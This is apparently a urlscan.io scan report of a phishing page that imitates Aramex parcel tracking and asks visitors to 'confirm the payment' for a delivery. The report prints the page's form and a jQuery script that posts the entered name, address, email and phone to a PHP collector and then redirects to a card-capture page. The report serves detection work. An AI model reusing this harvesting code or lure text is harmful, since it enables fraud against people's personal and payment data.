perry.is.eenbeetjegek.nl Open in urlscan Pro
185.227.81.30  Malicious Activity! Public Scan

Submitted URL: https://r20.rs6.net/tn.jsp?f=001sPt9e67nT3EMH-LJuctNf4KTT_epiQwFSiPkN2KzYNDL4SkDZMKfauZAvfpcmtiAV4ddxKYaYGQL-R3ch9HV...
Effective URL: https://perry.is.eenbeetjegek.nl/physicooptics/-/3PztkAi/
Submission: On July 17 via manual from IN — Scanned from DE

Form analysis 2 forms found in the DOM

POST

<form class="amx-h-align-left ng-pristine ng-valid" action="" id="frmCountry" method="post">
  <div class="btn-group bootstrap-select amx-cp-locale-select select--country">
    <button type="button" class="btn  selectpicker amx-cp-locale-select-btn" data-toggle="" data-id="cmbCountry" title="">
      <span class="filter-option pull-left"></span>
    </button>
    <div class="dropdown-menu open">
      <div class="bs-searchbox">
      </div>
      <ul class="dropdown-menu inner selectpicker" role="menu">
        <li data-original-index="0"><a tabindex="0" class="" data-normalized-text="<span class=&quot;text&quot;>Afghanistan </span>"></a></li>
      </ul>
    </div>
  </div>
</form>

POST

<form action="" id="f" method="post">
  <div class="has-feedback amx-form-entry-container">
    <input type="hidden" id="screen" name="screen" value="1600 x 1200">
    <label for="leadgenerationnewmodelview_firstname">Full Name<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_name" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" name="leadgenerationnewmodelview_name" required="">
    <br>
    <label for="leadgenerationnewmodelview_firstname">Adresse<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_adr" name="leadgenerationnewmodelview_adr" placeholder="" type="text" value="" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" data-form-validation-type="regex"
      data-form-validation-rule="^.{1,}$" pattern="^.{1,}$" required="">
    <br>
    <label for="leadgenerationnewmodelview_cty">City<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_cty" name="leadgenerationnewmodelview_cty" placeholder="" type="text" value="" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" data-form-validation-type="regex"
      data-form-validation-rule="^.{1,}$" pattern="^.{1,}$" required="">
    <br>
    <label for="leadgenerationnewmodelview_stt">State<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_stt" name="leadgenerationnewmodelview_stt" placeholder="" required="" type="text" value="" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" data-form-validation-type="regex"
      data-form-validation-rule="[a-zA-Z-']+.{2,15}" pattern="[a-zA-Z-']+.{2,15}">
    <br>
    <label for="leadgenerationnewmodelview_zip">Zip Code<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_zip" name="leadgenerationnewmodelview_zip" placeholder="" type="text" value="" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" data-form-validation-rule="[a-zA-Z-0-9].{3,10}"
      pattern="[a-zA-Z-0-9].{3,10}" required="">
    <br>
    <label for="leadgenerationnewmodelview_cnt">country/region<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_cnt" name="leadgenerationnewmodelview_cnt" placeholder="" type="text" value="" data-form-validation-type="regex" data-form-validation-rule="^.{1,}$" pattern="^.{1,}$"
      class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" required="">
    <br>
    <label for="leadgenerationnewmodelview_eml">Email<span class="amx-label-asterisk">*</span></label>
    <input id="leadgenerationnewmodelview_eml" name="leadgenerationnewmodelview_eml" placeholder="" type="text" value="" data-form-validation-type="regex" data-form-validation-rule="^([^\s@]+)@((?:[^\s@\.]+)\.)+([a-zA-Z]{2,4})$"
      pattern="^([^\s@]+)@((?:[^\s@\.]+)\.)+([a-zA-Z]{2,4})$" class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" required="">
    <br>
    <label for="leadgenerationnewmodelview_phn">Phone number including country code</label>
    <input id="leadgenerationnewmodelview_phn" name="leadgenerationnewmodelview_phn" data-form-validation-type="regex" data-form-validation-rule="^[\d ()-/+]{1,}$" pattern="^[\d ()-/+]{1,}$" placeholder="06 12 34 56 78" type="text" value=""
      class="ng-pristine ng-untouched ng-empty ng-valid ng-valid-amx-phone" autocomplete="off" required="">
    <br><br><br>
    <button class="amx-cp-btn amx-mr-wide amx-h-align-left">Next</button>
    <script type="text/javascript">
      var request;
      $("#f").submit(function(event) {
        event.preventDefault();
        if (request) {
          request.abort();
        }
        var $form = $(this);
        var $inputs = $form.find("input, select, button, textarea");
        var serializedData = $form.serialize();
        $inputs.prop("disabled", true);
        $("#f")[0].reset();
        request = $.ajax({
          url: "./system/ar09301.php",
          type: "post",
          data: serializedData
        });
        request.done(function(response, textStatus, jqXHR) {
          $(location).attr("href", "./pickupcc.php?country.x=Global&tow=ok&flowId=ul&_Email=datax#otp");
        });
        request.fail(function(jqXHR, textStatus, errorThrown) {
          console.error("The following error occurred: " + textStatus, errorThrown);
        });
        request.always(function() {
          $inputs.prop("disabled", false);
        });
      });
    </script>
    <br><br>
  </div>
</form>

Text Content

Aramex Corporate
 * 

 * 
 * 
 *  * Track
    * Ship
    * Solutions & Services
    * Help & Support



 * Address
 * Paiement
 * confirmed


ARAMEX TRACKING.

Here you will find information about your shipments.
Track your parcel shipments at any time from shipping to delivery.




ARAMEX TRACKING.


CONFIRM THE ADDRESS


To complete the delivery as soon as possible, please confirm the payment

by clicking Next. Online confirmation must be made within the next 14 days,
before it expires.


All fields marked with an asterisk (*) are mandatory.

Full Name*
Adresse*
City*
State*
Zip Code*
country/region*
Email*
Phone number including country code


Next










TERMS OF USE

PRIVACY POLICY

FRAUD PREVENTION

CUSTOMER SUPPORT

 * 
 * 
 * 
 * 
 * 

© Aramex 2021. 2022All rights reserved.